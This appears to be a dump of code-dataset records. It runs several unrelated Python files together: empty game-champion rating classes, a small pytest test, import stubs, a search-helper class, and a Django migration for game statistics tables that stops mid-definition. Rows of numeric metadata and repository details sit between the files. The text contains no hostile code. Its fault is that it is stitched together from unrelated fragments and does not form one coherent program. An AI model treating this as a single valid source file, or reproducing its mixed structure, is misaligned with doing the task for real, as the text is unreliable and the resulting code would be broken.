class NA_Varus_Bot_Ryze(Ratings):
pass
class NA_Varus_Bot_Sejuani(Ratings):
pass
class NA_Varus_Bot_Shaco(Ratings):
pass
class NA_Varus_Bot_Shen(Ratings):
pass
class NA_Varus_Bot_Shyvana(Ratings):
pass
class NA_Varus_Bot_Singed(Ratings):
pass
class NA_Varus_Bot_Sion(Ratings):
pass
class NA_Varus_Bot_Sivir(Ratings):
pass
class NA_Varus_Bot_Skarner(Ratings):
pass
class NA_Varus_Bot_Sona(Ratings):
pass
class NA_Varus_Bot_Soraka(Ratings):
pass
class NA_Varus_Bot_Swain(Ratings):
pass
class NA_Varus_Bot_Syndra(Ratings):
pass
class NA_Varus_Bot_TahmKench(Ratings):
pass
class NA_Varus_Bot_Taliyah(Ratings):
pass
class NA_Varus_Bot_Talon(Ratings):
pass
class NA_Varus_Bot_Taric(Ratings):
pass
class NA_Varus_Bot_Teemo(Ratings):
pass
class NA_Varus_Bot_Thresh(Ratings):
pass
class NA_Varus_Bot_Tristana(Ratings):
pass
class NA_Varus_Bot_Trundle(Ratings):
pass
class NA_Varus_Bot_Tryndamere(Ratings):
pass
class NA_Varus_Bot_TwistedFate(Ratings):
pass
class NA_Varus_Bot_Twitch(Ratings):
pass
class NA_Varus_Bot_Udyr(Ratings):
pass
class NA_Varus_Bot_Urgot(Ratings):
pass
class NA_Varus_Bot_Varus(Ratings):
pass
class NA_Varus_Bot_Vayne(Ratings):
pass
class NA_Varus_Bot_Veigar(Ratings):
pass
class NA_Varus_Bot_Velkoz(Ratings):
pass
class NA_Varus_Bot_Vi(Ratings):
pass
class NA_Varus_Bot_Viktor(Ratings):
pass
class NA_Varus_Bot_Vladimir(Ratings):
pass
class NA_Varus_Bot_Volibear(Ratings):
pass
class NA_Varus_Bot_Warwick(Ratings):
pass
class NA_Varus_Bot_Xayah(Ratings):
pass
class NA_Varus_Bot_Xerath(Ratings):
pass
class NA_Varus_Bot_XinZhao(Ratings):
pass
class NA_Varus_Bot_Yasuo(Ratings):
pass
class NA_Varus_Bot_Yorick(Ratings):
pass
class NA_Varus_Bot_Zac(Ratings):
pass
class NA_Varus_Bot_Zed(Ratings):
pass
class NA_Varus_Bot_Ziggs(Ratings):
pass
class NA_Varus_Bot_Zilean(Ratings):
pass
class NA_Varus_Bot_Zyra(Ratings):
pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
f4f49bb66cccb8ef0abf49aa6aedaf8c745113d4
| 126
|
py
|
Python
|
test_docker_mirror.py
|
chldong/docker_mirror
|
f7b9f87a3bb5caf1394a7ceddbaaef38676f99fa
|
[
"MIT"
] | 376
|
2017-10-23T03:34:16.000Z
|
2022-03-31T01:24:39.000Z
|
test_docker_mirror.py
|
chldong/docker_mirror
|
f7b9f87a3bb5caf1394a7ceddbaaef38676f99fa
|
[
"MIT"
] | 17
|
2018-04-04T14:32:47.000Z
|
2020-09-14T13:40:56.000Z
|
test_docker_mirror.py
|
chldong/docker_mirror
|
f7b9f87a3bb5caf1394a7ceddbaaef38676f99fa
|
[
"MIT"
] | 115
|
2017-11-06T07:18:49.000Z
|
2022-03-08T00:55:53.000Z
|
import pytest
from docker_mirror import execute_sys_cmd
def test_execute_sys_cmd():
assert execute_sys_cmd("date") == 0
| 18
| 41
| 0.785714
| 20
| 126
| 4.55
| 0.65
| 0.32967
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009259
| 0.142857
| 126
| 6
| 42
| 21
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.031746
| 0
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
f4f6b0641272f491779dbcf9b284526130134303
| 120
|
py
|
Python
|
test_project/testapp/tests/__init__.py
|
kmike/tornado-slacker
|
3f11ad29777fa24bde6bf42b66c37beca97eafc5
|
[
"MIT"
] | 8
|
2015-01-14T22:34:23.000Z
|
2016-02-11T19:49:35.000Z
|
test_project/testapp/tests/__init__.py
|
kmike/tornado-slacker
|
3f11ad29777fa24bde6bf42b66c37beca97eafc5
|
[
"MIT"
] | null | null | null |
test_project/testapp/tests/__init__.py
|
kmike/tornado-slacker
|
3f11ad29777fa24bde6bf42b66c37beca97eafc5
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from slacker.tests import *
from .django_tests import *
from .workers import *
| 17.142857
| 38
| 0.8
| 16
| 120
| 5.625
| 0.5
| 0.333333
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 120
| 6
| 39
| 20
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
760f5c2a868751c7cd78e96280727996cdd3cb93
| 318
|
py
|
Python
|
Search/Helper/SearchHelper.py
|
jbzdarkid/TwitchLink
|
c7bae13b46c7e6af7dc74539fdbca9cbb01f4778
|
[
"MIT"
] | 26
|
2021-02-04T00:29:21.000Z
|
2022-03-25T17:14:43.000Z
|
Search/Helper/SearchHelper.py
|
jbzdarkid/TwitchLink
|
c7bae13b46c7e6af7dc74539fdbca9cbb01f4778
|
[
"MIT"
] | 19
|
2021-02-04T01:27:07.000Z
|
2022-03-19T16:22:46.000Z
|
Search/Helper/SearchHelper.py
|
jbzdarkid/TwitchLink
|
c7bae13b46c7e6af7dc74539fdbca9cbb01f4778
|
[
"MIT"
] | 10
|
2021-06-08T17:41:40.000Z
|
2022-03-28T22:38:40.000Z
|
from .Config import Config
class SearchHelper:
@staticmethod
def getChannelIdExamples():
return Config.CHANNEL_ID_EXAMPLES
@staticmethod
def getVideoClipIdExamples():
return Config.VIDEO_CLIP_ID_EXAMPLES
@staticmethod
def getUrlExamples():
return Config.URL_EXAMPLES
| 21.2
| 44
| 0.720126
| 30
| 318
| 7.433333
| 0.566667
| 0.201794
| 0.197309
| 0.224215
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.226415
| 318
| 15
| 45
| 21.2
| 0.906504
| 0
| 0
| 0.272727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.272727
| true
| 0
| 0.090909
| 0.272727
| 0.727273
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
5207449f6afa34e03b15ea6eca2dd4e55c06e987
| 234
|
py
|
Python
|
models/__init__.py
|
lim0606/pytorch-ardae-rl
|
6e861d8f09ee27fa8f7b42d1eb209788c93395fa
|
[
"MIT"
] | 7
|
2020-09-13T20:36:24.000Z
|
2022-03-31T09:30:36.000Z
|
models/__init__.py
|
lim0606/pytorch-ardae-rl
|
6e861d8f09ee27fa8f7b42d1eb209788c93395fa
|
[
"MIT"
] | null | null | null |
models/__init__.py
|
lim0606/pytorch-ardae-rl
|
6e861d8f09ee27fa8f7b42d1eb209788c93395fa
|
[
"MIT"
] | null | null | null |
# dae
from models.graddae.mlp import DAE as MLPGradDAE
from models.graddae.mlp import ARDAE as MLPGradARDAE
from models.graddae.mlp import ConditionalDAE as MLPGradCDAE
from models.graddae.mlp import ConditionalARDAE as MLPGradCARDAE
| 39
| 64
| 0.850427
| 33
| 234
| 6.030303
| 0.424242
| 0.201005
| 0.341709
| 0.40201
| 0.522613
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 234
| 5
| 65
| 46.8
| 0.956731
| 0.012821
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5216f13a99bf077608c3c9f1ddcadbb330d03955
| 33,109
|
py
|
Python
|
backend/gamestatistics/migrations/0001_initial.py
|
b3none/Tensor
|
6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba
|
[
"MIT"
] | null | null | null |
backend/gamestatistics/migrations/0001_initial.py
|
b3none/Tensor
|
6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba
|
[
"MIT"
] | null | null | null |
backend/gamestatistics/migrations/0001_initial.py
|
b3none/Tensor
|
6c70c7d3ade6eabe4162d0b9eef0923c79ea1eba
|
[
"MIT"
] | 3
|
2021-09-06T18:01:52.000Z
|
2021-10-18T02:49:53.000Z
|
# Generated by Django 3.0.5 on 2021-07-09 17:16
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='CkAnnouncements',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('server', models.CharField(max_length=256)),
('name', models.CharField(max_length=32)),
('mapname', models.CharField(max_length=128)),
('mode', models.IntegerField()),
('time', models.CharField(max_length=32)),
('group', models.IntegerField()),
('style', models.IntegerField()),
],
options={
'db_table': 'ck_announcements',
'managed': False,
},
),
migrations.CreateModel(
name='CkBonus',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('name', models.CharField(blank=True, max_length=32, null=True)),
('mapname', models.CharField(max_length=32)),
('runtime', models.FloatField()),
('zonegroup', models.IntegerField()),
('style', models.IntegerField()),
],
options={
'db_table': 'ck_bonus',
'managed': False,
},
),
migrations.CreateModel(
name='CkCheckpoints',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('mapname', models.CharField(max_length=32)),
('cp1', models.FloatField(blank=True, null=True)),
('cp2', models.FloatField(blank=True, null=True)),
('cp3', models.FloatField(blank=True, null=True)),
('cp4', models.FloatField(blank=True, null=True)),
('cp5', models.FloatField(blank=True, null=True)),
('cp6', models.FloatField(blank=True, null=True)),
('cp7', models.FloatField(blank=True, null=True)),
('cp8', models.FloatField(blank=True, null=True)),
('cp9', models.FloatField(blank=True, null=True)),
('cp10', models.FloatField(blank=True, null=True)),
('cp11', models.FloatField(blank=True, null=True)),
('cp12', models.FloatField(blank=True, null=True)),
('cp13', models.FloatField(blank=True, null=True)),
('cp14', models.FloatField(blank=True, null=True)),
('cp15', models.FloatField(blank=True, null=True)),
('cp16', models.FloatField(blank=True, null=True)),
('cp17', models.FloatField(blank=True, null=True)),
('cp18', models.FloatField(blank=True, null=True)),
('cp19', models.FloatField(blank=True, null=True)),
('cp20', models.FloatField(blank=True, null=True)),
('cp21', models.FloatField(blank=True, null=True)),
('cp22', models.FloatField(blank=True, null=True)),
('cp23', models.FloatField(blank=True, null=True)),
('cp24', models.FloatField(blank=True, null=True)),
('cp25', models.FloatField(blank=True, null=True)),
('cp26', models.FloatField(blank=True, null=True)),
('cp27', models.FloatField(blank=True, null=True)),
('cp28', models.FloatField(blank=True, null=True)),
('cp29', models.FloatField(blank=True, null=True)),
('cp30', models.FloatField(blank=True, null=True)),
('cp31', models.FloatField(blank=True, null=True)),
('cp32', models.FloatField(blank=True, null=True)),
('cp33', models.FloatField(blank=True, null=True)),
('cp34', models.FloatField(blank=True, null=True)),
('cp35', models.FloatField(blank=True, null=True)),
('zonegroup', models.IntegerField()),
],
options={
'db_table': 'ck_checkpoints',
'managed': False,
},
),
migrations.CreateModel(
name='CkLatestrecords',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('name', models.CharField(blank=True, max_length=32, null=True)),
('runtime', models.FloatField()),
('map', models.CharField(max_length=32)),
('date', models.DateTimeField()),
],
options={
'db_table': 'ck_latestrecords',
'managed': False,
},
),
migrations.CreateModel(
name='CkMaptier',
fields=[
('mapname', models.CharField(max_length=54, primary_key=True, serialize=False)),
('tier', models.IntegerField()),
('maxvelocity', models.FloatField()),
('announcerecord', models.IntegerField()),
('gravityfix', models.IntegerField()),
('ranked', models.IntegerField()),
],
options={
'db_table': 'ck_maptier',
'managed': False,
},
),
migrations.CreateModel(
name='CkNewmaps',
fields=[
('mapname', models.CharField(max_length=32, primary_key=True, serialize=False)),
('date', models.DateTimeField()),
],
options={
'db_table': 'ck_newmaps',
'managed': False,
},
),
migrations.CreateModel(
name='CkPlayeroptions2',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('timer', models.IntegerField()),
('hide', models.IntegerField()),
('sounds', models.IntegerField()),
('chat', models.IntegerField()),
('viewmodel', models.IntegerField()),
('autobhop', models.IntegerField()),
('checkpoints', models.IntegerField()),
('gradient', models.IntegerField()),
('speedmode', models.IntegerField()),
('centrespeed', models.IntegerField()),
('centrehud', models.IntegerField()),
('teleside', models.IntegerField()),
('module1c', models.IntegerField()),
('module2c', models.IntegerField()),
('module3c', models.IntegerField()),
('module4c', models.IntegerField()),
('module5c', models.IntegerField()),
('module6c', models.IntegerField()),
('sidehud', models.IntegerField()),
('module1s', models.IntegerField()),
('module2s', models.IntegerField()),
('module3s', models.IntegerField()),
('module4s', models.IntegerField()),
('module5s', models.IntegerField()),
('prestrafe', models.IntegerField()),
('cpmessages', models.IntegerField()),
('wrcpmessages', models.IntegerField()),
],
options={
'db_table': 'ck_playeroptions2',
'managed': False,
},
),
migrations.CreateModel(
name='CkPlayerrank',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('steamid64', models.CharField(blank=True, max_length=64, null=True)),
('name', models.CharField(blank=True, max_length=32, null=True)),
('country', models.CharField(blank=True, max_length=32, null=True)),
('points', models.IntegerField(blank=True, null=True)),
('wrpoints', models.IntegerField()),
('wrbpoints', models.IntegerField()),
('wrcppoints', models.IntegerField()),
('top10points', models.IntegerField()),
('groupspoints', models.IntegerField()),
('mappoints', models.IntegerField()),
('bonuspoints', models.IntegerField()),
('finishedmaps', models.IntegerField(blank=True, null=True)),
('finishedmapspro', models.IntegerField(blank=True, null=True)),
('finishedbonuses', models.IntegerField()),
('finishedstages', models.IntegerField()),
('wrs', models.IntegerField()),
('wrbs', models.IntegerField()),
('wrcps', models.IntegerField()),
('top10s', models.IntegerField()),
('groups', models.IntegerField()),
('lastseen', models.IntegerField(blank=True, null=True)),
('joined', models.IntegerField()),
('timealive', models.IntegerField()),
('timespec', models.IntegerField()),
('connections', models.IntegerField()),
('readchangelog', models.IntegerField()),
('style', models.IntegerField()),
],
options={
'db_table': 'ck_playerrank',
'managed': False,
},
),
migrations.CreateModel(
name='CkPlayertemp',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('mapname', models.CharField(max_length=32)),
('cords1', models.FloatField()),
('cords2', models.FloatField()),
('cords3', models.FloatField()),
('angle1', models.FloatField()),
('angle2', models.FloatField()),
('angle3', models.FloatField()),
('enctickrate', models.IntegerField(blank=True, db_column='EncTickrate', null=True)),
('runtimetmp', models.FloatField(db_column='runtimeTmp')),
('stage', models.IntegerField(blank=True, db_column='Stage', null=True)),
('zonegroup', models.IntegerField()),
],
options={
'db_table': 'ck_playertemp',
'managed': False,
},
),
migrations.CreateModel(
name='CkPlayertimes',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('mapname', models.CharField(max_length=32)),
('name', models.CharField(blank=True, max_length=32, null=True)),
('runtimepro', models.FloatField()),
('style', models.IntegerField()),
],
options={
'db_table': 'ck_playertimes',
'managed': False,
},
),
migrations.CreateModel(
name='CkSpawnlocations',
fields=[
('mapname', models.CharField(max_length=54, primary_key=True, serialize=False)),
('pos_x', models.FloatField()),
('pos_y', models.FloatField()),
('pos_z', models.FloatField()),
('ang_x', models.FloatField()),
('ang_y', models.FloatField()),
('ang_z', models.FloatField()),
('vel_x', models.FloatField()),
('vel_y', models.FloatField()),
('vel_z', models.FloatField()),
('zonegroup', models.IntegerField()),
('stage', models.IntegerField()),
('teleside', models.IntegerField()),
],
options={
'db_table': 'ck_spawnlocations',
'managed': False,
},
),
migrations.CreateModel(
name='CkVipadmins',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('title', models.CharField(blank=True, max_length=128, null=True)),
('namecolour', models.IntegerField(blank=True, null=True)),
('textcolour', models.IntegerField()),
('joinmsg', models.CharField(blank=True, max_length=255, null=True)),
('pbsound', models.CharField(max_length=256)),
('topsound', models.CharField(max_length=256)),
('wrsound', models.CharField(max_length=256)),
('inuse', models.IntegerField(blank=True, null=True)),
('vip', models.IntegerField(blank=True, null=True)),
('admin', models.IntegerField()),
('zoner', models.IntegerField()),
('active', models.IntegerField()),
],
options={
'db_table': 'ck_vipadmins',
'managed': False,
},
),
migrations.CreateModel(
name='CkWrcps',
fields=[
('steamid', models.CharField(max_length=32, primary_key=True, serialize=False)),
('name', models.CharField(blank=True, max_length=32, null=True)),
('mapname', models.CharField(max_length=32)),
('runtimepro', models.FloatField()),
('stage', models.IntegerField()),
('style', models.IntegerField()),
],
options={
'db_table': 'ck_wrcps',
'managed': False,
},
),
migrations.CreateModel(
name='CkZones',
fields=[
('mapname', models.CharField(max_length=54, primary_key=True, serialize=False)),
('zoneid', models.IntegerField()),
('zonetype', models.IntegerField(blank=True, null=True)),
('zonetypeid', models.IntegerField(blank=True, null=True)),
('pointa_x', models.FloatField(blank=True, null=True)),
('pointa_y', models.FloatField(blank=True, null=True)),
('pointa_z', models.FloatField(blank=True, null=True)),
('pointb_x', models.FloatField(blank=True, null=True)),
('pointb_y', models.FloatField(blank=True, null=True)),
('pointb_z', models.FloatField(blank=True, null=True)),
('vis', models.IntegerField(blank=True, null=True)),
('team', models.IntegerField(blank=True, null=True)),
('zonegroup', models.IntegerField()),
('zonename', models.CharField(blank=True, max_length=128, null=True)),
('hookname', models.CharField(blank=True, max_length=128, null=True)),
('targetname', models.CharField(blank=True, max_length=128, null=True)),
('onejumplimit', models.IntegerField()),
('prespeed', models.IntegerField()),
],
options={
'db_table': 'ck_zones',
'managed': False,
},
),
migrations.CreateModel(
name='Rank_awp',
fields=[
('steam', models.CharField(blank=True, max_length=40, primary_key=True, serialize=False, unique=True)),
('name', models.TextField(blank=True, null=True)),
('lastip', models.TextField(blank=True, null=True)),
('score', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('kills', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('deaths', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('assists', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('suicides', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('tk', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('shots', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('hits', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('headshots', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('connected', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('rounds_tr', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('rounds_ct', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('lastconnect', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('knife', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('glock', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('hkp2000', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('usp_silencer', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('p250', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('deagle', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('elite', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('fiveseven', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('tec9', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('cz75a', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('revolver', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('nova', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('xm1014', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mag7', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('sawedoff', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('bizon', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mac10', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mp9', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mp7', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('ump45', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('p90', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('galilar', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('ak47', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('scar20', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('famas', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('m4a1', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('m4a1_silencer', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('aug', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('ssg08', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('sg556', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('awp', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('g3sg1', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('m249', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('negev', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('hegrenade', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('flashbang', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('smokegrenade', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('inferno', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('decoy', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('taser', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mp5sd', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('breachcharge', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('head', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('chest', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('stomach', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('left_arm', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('right_arm', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('left_leg', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('right_leg', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('c4_planted', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('c4_exploded', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('c4_defused', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('ct_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('tr_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('hostages_rescued', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('vip_killed', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('vip_escaped', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('vip_played', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mvp', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('damage', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('match_win', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('match_draw', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('match_lose', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('first_blood', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('no_scope', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('no_scope_dis', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
],
options={
'db_table': 'rankme',
'abstract': False,
'managed': False,
},
),
migrations.CreateModel(
name='Rank_retake',
fields=[
('steam', models.CharField(blank=True, max_length=40, primary_key=True, serialize=False, unique=True)),
('name', models.TextField(blank=True, null=True)),
('lastip', models.TextField(blank=True, null=True)),
('score', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('kills', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('deaths', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('assists', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('suicides', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('tk', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('shots', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('hits', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('headshots', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('connected', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('rounds_tr', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('rounds_ct', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('lastconnect', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('knife', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('glock', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('hkp2000', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('usp_silencer', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('p250', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('deagle', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('elite', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('fiveseven', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('tec9', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('cz75a', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('revolver', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('nova', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('xm1014', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mag7', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('sawedoff', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('bizon', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mac10', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mp9', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('mp7', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('ump45', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('p90', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('galilar', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('ak47', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('scar20', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('famas', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('m4a1', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('m4a1_silencer', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('aug', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('ssg08', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('sg556', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
('awp', models.DecimalField(blank=True, decimal_places=0, max_digits=10, null=True)),
